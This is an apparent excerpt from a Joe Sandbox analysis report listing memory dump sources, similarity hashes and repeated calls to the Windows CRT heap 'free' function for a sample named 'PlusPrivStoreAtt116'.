                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: b3c3805f82caad35ddc01d018df6cc76f4a284c910c5e9ee53ad49d6aa0b3735
                                        • Instruction ID: d0ba0cf554bf3d1f4c5d3097f2511bfa083794a7aadb2151710b8e427f4584e3
                                        • Opcode Fuzzy Hash: b3c3805f82caad35ddc01d018df6cc76f4a284c910c5e9ee53ad49d6aa0b3735
                                        • Instruction Fuzzy Hash: D911F536604B81C6DB50CF26E59036977A4FB84F98F684036DE8E97728CF78E8A5C750
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029F124E), ref: 00007FF6029F5176
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029F124E), ref: 00007FF6029F5197
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029F124E), ref: 00007FF6029F51B2
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029F124E), ref: 00007FF6029F51C0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 5c8853aa7cfb41fb736cb08fd9c58292c725a3a828156dd37d5180451661d39c
                                        • Instruction ID: 3cc57ef8a32b8d7383dbad1435b805eaf6b54208e31e96071a1dcd547e7f3efc
                                        • Opcode Fuzzy Hash: 5c8853aa7cfb41fb736cb08fd9c58292c725a3a828156dd37d5180451661d39c
                                        • Instruction Fuzzy Hash: 6211B736A04B4682EB54DF26E99012D77B9FF94F997200436CE5D83768CF78D891C380
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C8D15,?,?,00000000,00007FF6029C19D1,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029F2B00
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C8D15,?,?,00000000,00007FF6029C19D1,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029F2B26
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C8D15,?,?,00000000,00007FF6029C19D1,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029F2B34
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C8D15,?,?,00000000,00007FF6029C19D1,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029F2B42
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 0ca5987a86bd8772b3c6def7f7db8b85989afe65d4c00123de1d083a15ff9c08
                                        • Instruction ID: 8ad2aae5bbc963069917e6f61790e9064d64b27ad39843ea8fc147d4c9f23b0b
                                        • Opcode Fuzzy Hash: 0ca5987a86bd8772b3c6def7f7db8b85989afe65d4c00123de1d083a15ff9c08
                                        • Instruction Fuzzy Hash: 50F0E776604B02C2DB14CF22E9A412977B4FF98F987214532CEAE83768CF78C8A5C340